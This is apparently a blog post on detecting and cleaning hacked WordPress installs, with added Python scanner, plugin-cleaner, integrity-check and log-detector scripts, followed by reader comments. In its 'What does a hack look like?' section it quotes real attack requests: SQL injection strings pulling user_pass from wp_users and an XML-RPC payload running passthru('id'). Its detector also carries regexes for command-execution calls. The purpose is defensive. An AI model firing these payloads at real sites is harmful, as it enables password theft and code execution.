Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn't you? No? Then it was inevitable that you'd be hacked. If you haven't been hacked yet, it's only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero-day WordPress exploit, and there is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They're using the old exploits all over again. This time they're redirecting hits that arrive from Google to your blog: those hits are instead sent on to your-needs.info and anyresult.net.

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won't be very secret, will it?
    define('SECRET_KEY', '1234567890');

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the web server then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won't be overwritten, so make sure you double-check those files for any strange code that uses eval() or base64_decode(). Here's a code snippet taken from here:
    <?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check the .htaccess file in the root of your blog. If you've never edited it, it should look like this:
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    That file may also contain this block, which relates to the uploader:

    <IfModule mod_security.c>
    <Files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </Files>
    </IfModule>

  • They're also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes them harder to find, but not impossible:
    1. Open phpMyAdmin, go to your blog's options table and find the active_plugins record.
    2. Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you also remove the serialized array information that wraps that entry. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This YouTube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record, but it won't hurt to do it.
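Checking for the hiding places listed above can be scripted. The following Python is an added example, not code from the original post or from WordPress: it walks a blog directory, flags any PHP line containing the constructs named above (eval(), base64_decode(), the k1b0rg and keymachine.de markers), and reports any .htaccess line that is not one of the lines WordPress writes itself. The demo tree it builds, including the planted code and the rogue RewriteRule, is constructed for the example.

```python
"""Scan a WordPress tree for the hiding places described in the post.

Added example; not code from the original post or from WordPress. The
patterns (eval(), base64_decode(), the k1b0rg and keymachine.de markers) and
the default .htaccess lines come from the post; the demo tree is constructed.
"""
import os
import re
import tempfile

# Constructs the post tells you to look for in PHP files.
SUSPICIOUS_PHP = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "k1b0rg marker": re.compile(r"k1b0rg"),
    "keymachine.de marker": re.compile(r"keymachine\.de"),
}

# Lines WordPress writes to .htaccess itself (rewrite block plus the
# mod_security exception for the uploader). Anything else in the file
# deserves a look, e.g. a RewriteRule that sends visitors to another host.
WP_HTACCESS_LINES = {line.lower() for line in [
    "# BEGIN WordPress", "<IfModule mod_rewrite.c>", "RewriteEngine On",
    "RewriteBase /", "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d", "RewriteRule . /index.php [L]",
    "</IfModule>", "# END WordPress",
    "<IfModule mod_security.c>", "<Files async-upload.php>",
    "SecFilterEngine Off", "SecFilterScanPOST Off", "</Files>",
]}


def scan_php_file(path):
    """Return (line_number, label, stripped_line) for each suspicious line."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for label, pattern in SUSPICIOUS_PHP.items():
                if pattern.search(line):
                    hits.append((lineno, label, line.strip()))
    return hits


def scan_htaccess(path):
    """Return the non-blank lines that are not part of WordPress's own block."""
    odd = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            stripped = line.strip()
            if stripped and stripped.lower() not in WP_HTACCESS_LINES:
                odd.append(stripped)
    return odd


def scan_tree(root):
    """Walk a blog directory and return {relative_path: findings} (hits only)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.endswith(".php"):
                findings = scan_php_file(full)
            elif name == ".htaccess":
                findings = scan_htaccess(full)
            else:
                continue
            if findings:
                report[rel] = findings
    return report


def build_demo_tree():
    """Write a constructed mini blog tree (with planted code) to a temp dir."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    files = {
        "wp-blog-header.php": "<?php\nrequire('./wp-load.php');\n"
                              "eval(base64_decode('aGVsbG8='));  // planted\n",
        "wp-includes/clean.php": "<?php\necho 'nothing to see';\n",
        "wp-content/themes/t/footer.php": "<?php // http://keymachine.de/x.php\n",
        ".htaccess": "# BEGIN WordPress\n<IfModule mod_rewrite.c>\nRewriteEngine On\n"
                     "RewriteRule .* http://example.invalid/ [R,L]\n</IfModule>\n"
                     "# END WordPress\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, findings in sorted(scan_tree(build_demo_tree()).items()):
        print(path)
        for finding in findings:
            print("   ", finding)
```

Point scan_tree() at your real document root (for the AIDE layout later in the post that would be /home/web/public_html). Expect a few legitimate base64_decode() hits inside WordPress core and well-known plugins; the useful comparison is against a fresh download of the same WordPress version, where the same files should produce the same hits and nothing more.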
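Step 2 above is fiddly because active_plugins is a PHP-serialized array, and a wrong string length leaves WordPress unable to unserialize the option at all. The following Python is an added example, not code from the post or from WordPress: it parses such an array of strings, drops every entry that is not a .php file or that climbs out of the plugins directory with ../, and re-serializes the rest with correct lengths. The sample option value is constructed after the ../uploads/2008/05/04/jhjyahjhnjnva.jpg entry quoted above; the akismet/akismet.php entry is just a stand-in for a legitimate plugin.

```python
"""Clean rogue entries out of a PHP-serialized active_plugins value.

Added example; not code from the original post or from WordPress. The
sample value is constructed after the ../uploads/.../jhjyahjhnjnva.jpg entry
quoted in the post. PHP's s:<len> is a byte count, so parsing works on bytes.
"""


def parse_string_list(blob):
    """Parse a:N:{i:0;s:LEN:"...";...} into a Python list of str."""
    data = blob.encode("utf-8") if isinstance(blob, str) else blob
    pos = 0

    def expect(token):
        nonlocal pos
        if not data.startswith(token, pos):
            raise ValueError(f"expected {token!r} at offset {pos}")
        pos += len(token)

    expect(b"a:")
    end = data.index(b":", pos)
    count = int(data[pos:end])
    pos = end + 1
    expect(b"{")
    items = []
    for _ in range(count):
        expect(b"i:")
        pos = data.index(b";", pos) + 1      # integer key; re-indexed on output
        expect(b"s:")
        end = data.index(b":", pos)
        length = int(data[pos:end])
        pos = end + 1
        expect(b'"')
        items.append(data[pos:pos + length].decode("utf-8"))
        pos += length
        expect(b'";')
    expect(b"}")
    if pos != len(data):
        raise ValueError("trailing bytes after the serialized array")
    return items


def serialize_string_list(items):
    """Inverse of parse_string_list; lengths are recomputed in bytes."""
    body = b"".join(
        b'i:%d;s:%d:"%s";' % (idx, len(raw), raw)
        for idx, raw in enumerate(item.encode("utf-8") for item in items)
    )
    return (b"a:%d:{" % len(items) + body + b"}").decode("utf-8")


def looks_rogue(plugin_path):
    """A real plugin is a .php file inside wp-content/plugins: never an image,
    and never reached through ../ (the post's hack used ../uploads/...)."""
    return (not plugin_path.lower().endswith(".php")
            or plugin_path.startswith("../")
            or "/../" in plugin_path)


def clean_active_plugins(serialized):
    """Return (cleaned_serialized_value, removed_entries)."""
    items = parse_string_list(serialized)
    kept = [p for p in items if not looks_rogue(p)]
    removed = [p for p in items if looks_rogue(p)]
    return serialize_string_list(kept), removed


if __name__ == "__main__":
    sample = ('a:2:{i:0;s:19:"akismet/akismet.php";'
              'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";}')
    cleaned, removed = clean_active_plugins(sample)
    print("removed:", removed)
    print("new option_value:", cleaned)
```

Paste the option_value from phpMyAdmin into clean_active_plugins(), review the removed list, and write the cleaned value back. The parser deliberately handles only the flat list of strings WordPress stores in active_plugins; it raises ValueError on anything else rather than guessing, which is the safe failure for a value you are about to write into the database.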

Change Your Passwords

Once you've upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn't added another user account he can use to log in again.

Stop the bad guys

One way of stopping the bad guys before they've done any major damage is to take regular backups and install an intrusion detection system (IDS).

  • I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire, but there are many others. I just installed AIDE to track changes on this server. It gives me a daily report on the files that have changed in that period, so if a hacker has changed a script or uploaded malicious code I'll get an email about it within a day. It does take some fine tuning, but it's easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
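For readers who would rather not install AIDE, here is the same idea in miniature. This Python script is an added example, not the post's code and not AIDE: it records a SHA-256 digest of every file under the web root, skipping the same logs and cache paths the AIDE rules above exclude, stores the result as a JSON baseline, and reports files that were added, removed or changed since. The demo site it builds and tampers with is constructed.

```python
"""Minimal file-integrity check in the spirit of the AIDE setup above.

Added example; not the post's code and not AIDE. It hashes every file under a
web root (skipping the logs and cache paths the AIDE rules exclude), stores the
result as a JSON baseline, and reports added/removed/changed files on the next
run. The demo site it builds is constructed.
"""
import fnmatch
import hashlib
import json
import os
import tempfile

# Same intent as the "!/.../logs/.*" and "!/.../wp-content/cache/.*" AIDE rules.
EXCLUDE_PATTERNS = ["*/logs/*", "*/wp-content/cache/*"]


def excluded(rel_path):
    """True if the path (relative, '/'-separated) matches an exclude pattern."""
    return any(fnmatch.fnmatch("/" + rel_path, pat) for pat in EXCLUDE_PATTERNS)


def file_digest(path):
    """SHA-256 of a file, read in chunks so large uploads do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Return {relative_path: sha256} for every non-excluded file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if not excluded(rel):
                result[rel] = file_digest(full)
    return result


def compare(baseline, current):
    """Diff two snapshots; changed = present in both with differing digests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def save_baseline(snap, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snap, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def build_demo_site():
    """Constructed web root: two PHP files plus a log and a cache file."""
    root = tempfile.mkdtemp(prefix="integrity-")
    files = {
        "wp-blog-header.php": "<?php require('./wp-load.php');\n",
        "wp-config.php": "<?php define('DB_NAME', 'blog');\n",
        "logs/access.log": "203.0.113.10 - - \"GET / HTTP/1.1\" 200\n",
        "wp-content/cache/page.html": "<html>cached</html>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def tamper_demo_site(root):
    """Simulate an intrusion: one edited core file and one planted 'image',
    plus ordinary log growth that must not be reported."""
    with open(os.path.join(root, "wp-blog-header.php"), "a") as fh:
        fh.write("eval(base64_decode('...'));\n")
    planted = os.path.join(root, "wp-content", "uploads", "2008", "05", "x.jpg")
    os.makedirs(os.path.dirname(planted), exist_ok=True)
    with open(planted, "w") as fh:
        fh.write("<?php // not an image\n")
    with open(os.path.join(root, "logs", "access.log"), "a") as fh:
        fh.write("203.0.113.10 - - \"GET /xmlrpc.php HTTP/1.1\" 200\n")


if __name__ == "__main__":
    site = build_demo_site()
    baseline_file = os.path.join(tempfile.mkdtemp(), "baseline.json")
    save_baseline(snapshot(site), baseline_file)   # run once; keep it off-box
    tamper_demo_site(site)
    print(json.dumps(compare(load_baseline(baseline_file), snapshot(site)), indent=1))
```

Run snapshot() once on a known-clean install and again from cron, then mail yourself the compare() output. Keep the baseline file somewhere the web server user cannot write (ideally on another machine, as you would with AIDE's database); an intruder who can write your PHP files can otherwise just refresh the baseline too. Unlike a mtime-based check, a digest comparison is not fooled by touch.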

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5-minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com; go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out-of-date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that's not installed. The bots are so dumb they'll even come back again and again performing the same attacks.

Here's what I call the "ekibastos attack". It happens over a number of requests and I've seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)" which strangely enough doesn't show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here's a snippet of the data.
    HTTP_RAW_POST_DATA: <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:
    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn't convince you that you must upgrade and check your website, I don't know what will.

PS. For completeness, here's another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
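The traces above (the "ekibastos attack" sequence and the XML-RPC payload in the PS) are what an attack looks like from inside the logs, and the same signatures can be checked automatically. The following Python detector is an added example, not code from the post: it encodes what those traces show (the k1b user agent, UNION SELECT against wp_users after undoing repeated URL-encoding such as %2527, UTF-7 and +AFw- trickery in trackbacks, the forged wordpressuser_ cookie sent to admin-ajax.php, and passthru()-style payloads in xmlrpc.php) and runs them over request records. The records, the source addresses and the blog.example host are constructed; the record layout (path, query string, user agent, raw POST body) is an assumption about what your own logging captures.

```python
"""Flag the attack patterns from the request traces above.

Added example, not code from the post. The rules encode what the traces show:
the k1b user agent, UNION SELECT against wp_users (after undoing repeated URL
encoding such as %2527), UTF-7 / +AFw- trickery in trackbacks, the forged
wordpressuser_ cookie sent to admin-ajax.php, and passthru()-style payloads in
xmlrpc.php. The request records, addresses and blog.example host are
constructed; the record layout is an assumption about what your logging keeps.
"""
import re
from urllib.parse import unquote

SQLI_WP_USERS = re.compile(r"union[\s+]+(?:all[\s+]+)?select\b.*\bwp_users\b", re.I | re.S)
BAD_USER_AGENT = re.compile(r"\bk1b\b|Windows Sot|Security Kol", re.I)
XMLRPC_EXEC = re.compile(r"\b(?:passthru|system|exec|shell_exec|eval)\s*\(", re.I)
UTF7_TRICK = re.compile(r"\+AFw-|charset=utf-7", re.I)
FORGED_COOKIE = re.compile(r"wordpressuser_[0-9a-f]{32}=[^;]*'")


def decode_fully(text, rounds=3):
    """Undo URL encoding until stable (bounded), so %2527 becomes a quote."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(req):
    """Return the rule names a request record trips; [] means nothing seen."""
    hits = []
    path, body = req["path"], decode_fully(req.get("body", ""))
    query = decode_fully(req.get("query", ""))
    if BAD_USER_AGENT.search(req.get("ua", "")):
        hits.append("known-bad-user-agent")
    if SQLI_WP_USERS.search(query) or SQLI_WP_USERS.search(body):
        hits.append("sql-injection-wp_users")
    if path.endswith("xmlrpc.php") and XMLRPC_EXEC.search(body):
        hits.append("xmlrpc-code-execution-attempt")
    if path.endswith("xmlrpc.php") and "k1b0rg" in body:
        hits.append("xmlrpc-k1b0rg-marker")
    if path.endswith("wp-trackback.php") and UTF7_TRICK.search(body):
        hits.append("trackback-utf7-trick")
    if path.endswith("admin-ajax.php") and FORGED_COOKIE.search(body):
        hits.append("admin-ajax-forged-cookie")
    return hits


def summarize(requests):
    """Group tripped rules by source address; quiet addresses are omitted."""
    by_ip = {}
    for req in requests:
        for rule in classify(req):
            by_ip.setdefault(req["ip"], set()).add(rule)
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


K1B_UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
MULTICALL = ("<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName>"
             "<params><param><value><array><data><value><struct><member><name>params"
             "</name><value><array><data><value><string>http://blog.example/category/"
             "&post_type=%27) UNION ALL SELECT 10048,2,3 FROM wp_users WHERE ID=1%2F*"
             "</string></value></data></array></value></member></struct></value>"
             "</data></array></value></param></params></methodCall>")
PASSTHRU = ("<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName>"
            "<params><param><value><name>','')); echo '______BEGIN______'; "
            "passthru('id'); echo '_____FIM_____'; exit;/*</name></value>"
            "</param></params></methodCall>")

# Constructed records modelled on the traces in the post.
SAMPLE_REQUESTS = [
    {"ip": "203.0.113.10", "path": "/index.php", "ua": K1B_UA, "body": "",
     "query": "cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))"
              "+FROM+wp_users+where+id=1/*"},
    {"ip": "203.0.113.10", "path": "/wp-admin/admin-ajax.php", "ua": K1B_UA, "query": "",
     "body": "cookie=wordpressuser_c73ce9557defbe87cea780be67f9ae1f%3Dxyz%2527%3B"},
    {"ip": "203.0.113.10", "path": "/xmlrpc.php", "ua": K1B_UA, "query": "", "body": MULTICALL},
    {"ip": "203.0.113.10", "path": "/wp-trackback.php", "ua": K1B_UA, "query": "p=1",
     "body": "url=ekibastos&title=ekibastos&blog_name=%2BAFw-%5C%27)/*&charset=UTF-7"},
    {"ip": "198.51.100.7", "path": "/xmlrpc.php", "ua": "Mozilla/5.0", "query": "", "body": PASSTHRU},
    {"ip": "192.0.2.55", "path": "/2008/05/hello-world/", "ua": "Mozilla/5.0 (X11; Linux) Firefox/3.0",
     "query": "", "body": ""},
]

if __name__ == "__main__":
    for ip, rules in sorted(summarize(SAMPLE_REQUESTS).items()):
        print(ip, ", ".join(rules))
```

Feed summarize() whatever your logging produces, one dict per request. Decoding the query string more than once matters: the post's GET requests carry %2527, which only becomes a quote after two rounds, and a single-decode filter misses it. On an upgraded install these requests all fail, as the post says; what the detector buys you is knowing which addresses are probing so you can block them at the firewall and check the rest of your logs from the same source.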

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.



384 thoughts on “Did your WordPress site get hacked?”


  1. What an excellent and well written post.

    I’ve been vulnerable and paid the price in the past. Thanks to articles such as this one I hope I’m a bit better protected these days.

    But they are clever bastards and trying to keep ahead of them is hard sometimes. I wonder just how many people don’t have the time (or indeed the knowledge) to find out how to protect themselves properly.

    It’d be great if WordPress could publish info such as this right on the front page, so that it’s brought to peoples attention more easily.

    Anyway, as I say, great post. Thanks for spending the time putting it out there for the rest of us.


  2. Umm… WordPress 2.5.0 and 2.5.1 appear to be vulnerable to this attack. I’ve personally helped a couple of people that were taken down by this hack (the one that redirects to anyresults.net).

    Here is an example of someone dealing with it on 2.5.x:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    I’ve done some digging, and it appears to be pretty widespread. Lots of sites that I frequent are affected.

    The only other possibility that I can think of is that DreamHost has been compromised (I think many of these sites are on DH — could it be that they’ve gotten in and are attacking these installs from the inside?).


  3. Great post. What about WP Security Scan Plugin? Is it ok to use, in order to see your WP security gaps?


  4. Thanks for the heads up on keymachine.de I keep seeing that one on a regular basis and have been tempted to just ban the whole domain, now I will!


  5. Good post, but as far as I remember, there is also a way to hide code only in the database, so it would take some time to detect and find it.


  6. Great post, Donncha. Thanks for clarifying exactly how these hacks work and underlining the importance of upgrading to the latest versions as soon as they’re available!


  7. Thanks for the warning. Someone contacted me regarding this issue of Google link redirecting and I thought it was an anomaly and asked them to check again. The second time she checked, the link directed to the correct page. Does that mean the hacked code somehow got overwritten? Or does the link redirection happen once in every “x” clicks or something to that order? The WP version is 2.5.1. Any input will be highly appreciated!


  8. fivecentnickel.com – I think there’s a good chance they were compromised before they upgraded. So many sites were hijacked the previous time the hackers activated their payload that there was bound to be a second wave.

    It’s probably worth double checking even if your site doesn’t exhibit any of the redirect problems. I know I grepped all my installs just in case.


  9. Very good tips. A hack could be hard to find, but my guess is you should always validate your feed.

    feedvalidator.org is a good tool you can use to take a look at what is being published and search for strange links, domains, etc..


  10. My blog got hacked. It makes me mad that the hackers can’t find a way to do something good with their skills rather than picking on innocent people.

    Thanks for a great post. I learned a lot!


  11. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    and that's exactly why cache should be outside of webroot, and almost everything else as well (plugins etc.) because guess where the next backdoor script is going to be placed..

    I host 9-10 wp blogs on a server, all running current. They have been hacked with 0day exploits 3 times in 6 months now. One of the blogs had so many pharma pages added to it that it was bringing the whole server to a crawl from the traffic.


  12. Here’s another tip: aside from checking file/directory permissions, make sure you don’t have obsolete JS directories/libraries lingering about. Much to my consternation I realized some “mysterious” pages were uploaded with an exploit of a JavaScript WYSIWYG (TinyMCE) editor. In my case, I did a full WP install refresh (just clearing out almost everything and uploaded a new set) as well as combing through all directories to find any suspect “additions” and that was the end of it.


  13. What’s the deal with the 2.3 and 2.5 branches of WordPress being plagued with security vulnerabilities??!! The older, (better, imo) WordPress 2.2.3 is not affected by any of the vulnerabilities discovered once these new versions were released.

    I believe this question deserves an answer from the WordPress developers. It’s as if security was completely thrown out the window with the release of 2.3.


  14. You are right, the xmlrpc.php exploit can be done easily with previous versions of WordPress; my blog was also attacked many times…
    However, the latest upgrade resolves the issues. Just a tip for other users: make sure that you block IPs through which attacks and spammers are coming; that will really help you.
    Regards,
    Himanshu


  15. I was hacked a few months ago…unfortunately for the hacker, I hadn’t started working on my site yet (still haven’t actually :P). Thankfully it was nothing more than a kiddie playing with his computer. 10 minutes on my FTP and my site was back to normal. I made sure to delete EVERY file that had been uploaded and/or modified the day the hack happened. That made cleanup REALLY easy if anyone ever has this happen to them. I even took a screenshot of my site hacked :D

    http://img241.imageshack.us/img241/5268/fuckxa9.png


  16. Wow, thanks buddy, these tips really helped me a lot. I will now upgrade to the latest version whenever it's out :) Currently I'm on the latest version, but I didn't upgrade for a long time until I noticed some bugs in the older version..
    Thanks again


  17. Serves me right for running an out of date WordPress I guess. Exact same attack, exact same IP address … 87.118.100.81 … I have informed abuse@keyweb.de. I wish I’d read this yesterday, though! Off to restore from backup …


  18. Thank you so much for this post. I upgraded to 2.5.1 the day it came out, but I’ve seen the attempts in WussUp and was not familiar with what they were trying to do, other than a vague suspicion it was probably malicious.

    I’ve heard from several other WP bloggers who’ve been hacked, and I will definitely be forwarding this post to them.

    Thanks again!


  19. Thank you SO MUCH for this article. I’ve definitely seen weird re-directs but I don’t know when they started since I rarely check my stats. Sigh. I don’t see any changed files and keep my server permissions rather tight (755 on directories and 644 on files) but something is wrong.

    At least with your article I have a starting point. I’m running 2.1.3 and got complacent….


  20. It only takes one time to learn. I got hacked two weeks ago before I upgraded and installed the security plugin. I haven’t had a problem since… just make sure you leave the scanner activated, and keep a lookout for WP upgrades. Doesn’t 2.6 come out soon?


  21. Don’t forget to check the database for cruft left by the attacker if they do get in.

    During the April attacks, I had cleaned up the files that had been compromised, but they still got back in a week or so later because some of the options had been tampered with, and a WordPress upgrade to 2.5 didn’t fix it.

    Actually viewing the tables was the only way to see the hidden user they’d created… there was no way to see it from inside the WP admin panels.


  22. I can’t find any files which have changed, and I’m hoping this is due to the permissions I have set, so I can only assume they made some database additions. I have no idea how to check that out but I’m off to see what I can find.


  23. Ok, I’ve upgraded to 2.5.1. Thank you SO MUCH for this article. When I ran upgrade.php WP upgraded the database also. (shrug) I did find 2 users I didn’t know anything about and just deleted all my users, even my own id, leaving only admin and then changed the password.

    I hope that is enough and I don’t have to go into the database (scary).


  24. One thing I do is delete xmlrpc.php. I don’t have any reason to post to my blog through it, and it’s been so bad for security, that I just blow it out. Another thing I do is cat /dev/null > wp-trackback.php which makes it an empty file with no functionality. I hate trackbacks… they drive me nuts, and it seems they too have been responsible for badness. From those two things, I’ve been able to weather these security lapses via the common methods. I got smacked by a bug via an email plugin that allowed spammers to inject email into it, but that’s another story.


  25. I got hacked. I sadly admit that I don’t know when it happened, but I caught it when I was going through referrals as listed in my SiteMeter account and I found that my site had taken a couple of google referrals for some drug.

    Since I’d never posted about that drug, I thought it possible that it was comment spam, although Akismet (and Spam Karma before that) had done well in stopping comment spam.

    It led me to a post on my blog. I did a “view source” in FireFox and concluded that there was code added to my “footer.php” file. I opened the file in the admin suite and cut the offending code.

    How does this stuff get in?


  26. I got hit and some of my hosting customers as well.
    Thanks for showing the query they try from the url to access wp_users table. That’s why I think one of the most important steps is to change your table prefix to something other than wp_, to make it impossible to find out.
    Also, stay away from fantastico installations, they are insecure.
    Regards.


  27. Ok, I upgraded, installed security plugins and still am having the referral problems. No files on my server were changed. After the upgrade they would have been gone anyway. So I downloaded and uploaded and activated a new theme – still wacky referrals, so it must be my database. I’m now renaming all the tables from wp_ to something else. Sigh.

    Any ideas where to find the database crud?


  28. Kathy, have you tried your theme folders? I had a .jpg image there called single_old.jpg which was the rogue file.


  29. @kathy,

    The database crud I found was in wp_users and wp_options.

    I posted details about what I found in the WP forums back in April/May when it happened the first time.

    The post with what to look for is http://wordpress.org/support/topic/168964#post-740607

    The other thread with info to look for is http://wordpress.org/support/topic/141041

    Basically, look for any entry in one of your options fields that has a strange looking file path with lots of dotdotslashes in it.


  30. Is 2.3.3 okay?

    The reason why I don’t upgrade is because the true blue theme for K2 hasn’t updated. I love that theme! :P


